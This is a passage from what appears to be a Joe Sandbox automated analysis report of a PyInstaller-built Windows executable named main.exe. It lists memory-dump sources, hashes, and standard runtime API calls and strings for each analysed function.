• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 2d0d38728c8b81eb1afee087d1255ca92539906646f1d2432080e5defd871a42
• Instruction ID: 8a01d6bae20aec8c74e6fa6f75121a05c21bf2671e93b918b2442de6b4d37efc
• Opcode Fuzzy Hash: 2d0d38728c8b81eb1afee087d1255ca92539906646f1d2432080e5defd871a42
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF618F32909BC5D1D6B0AB15E4407AAF7A0FB84794F448629EB9C13BA5DF7CE190CB10
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                                • Opcode ID: 881cb4ef47e13874d43f93ad661edca9df8e178c9ea1252ba64912ddd8f944cb
                                                                                                                                                                                                                                                                                • Instruction ID: ccac4aa825bc2a7012110ddc54e3f251be9be7f051d678c086cbb4806450a694
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 881cb4ef47e13874d43f93ad661edca9df8e178c9ea1252ba64912ddd8f944cb
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A51A132909282E6EBF4AB569044778B794FB44B84F94C139DA9C67BE5CF3CE860D710
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,00007FF73339866F), ref: 00007FF73339226E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: %ls$WARNING$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3372507544
                                                                                                                                                                                                                                                                                • Opcode ID: 92da2cbc5b979b0862b6cfd95371d042a7d5931ee882c49d5c626b31f152fc77
                                                                                                                                                                                                                                                                                • Instruction ID: ae42887fe154066b356715de44cca0a78eea566c40f391553b7ac0856764b020
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92da2cbc5b979b0862b6cfd95371d042a7d5931ee882c49d5c626b31f152fc77
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6321C522A1CB82A1E6B0EB50F4412EAB364FF847C0F808139EA8D63A5ADE3CD115D750
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                                • Opcode ID: fabcd4fad7fa856dcf2e9951dc7cbf89ababb6e1d40fd4369e0489b0ae7d9f25
                                                                                                                                                                                                                                                                                • Instruction ID: 7dc81da169eb9ac851014650f5b1cc61df75a0104caa78d31afb9d54caf82f7c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fabcd4fad7fa856dcf2e9951dc7cbf89ababb6e1d40fd4369e0489b0ae7d9f25
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43D12532B08A4099E760DF75D4502FC77B5FB44798B848239CE6EA7B99DE38E406D710
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                                • Opcode ID: 44877219fa58a3c80076740d489941753dcdf7d4d18713102933f3384318ca38
                                                                                                                                                                                                                                                                                • Instruction ID: 2232715cb1c020b6f6d085597032b2ae6b011e721407c57f8c6987fa0084c3f9
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44877219fa58a3c80076740d489941753dcdf7d4d18713102933f3384318ca38
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6410812A0878262FFB4AB25D501379F660EF90BA4F94823DEE5D16AE6DF3CD441D710
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333A9F82
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: RtlFreeHeap.NTDLL(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB47A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: GetLastError.KERNEL32(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB484
                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF73339C165), ref: 00007FF7333A9FA0
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                 • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                                • API String ID: 3580290477-1027480231
APIs
Strings
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF733391B4A), ref: 00007FF733392070
Strings
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$[PYI-%d:ERROR]
• API String ID: 2050909247-3704582800
APIs
Strings
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7333928DA,FFFFFFFF,00000000,00007FF73339336A), ref: 00007FF73339218E
Strings
Similarity
• API ID: CurrentProcess
• String ID: WARNING$[PYI-%d:%s]
• API String ID: 2050909247-3752221249
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF733391B79), ref: 00007FF733391E9E
Strings
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: ERROR$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3005936843
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711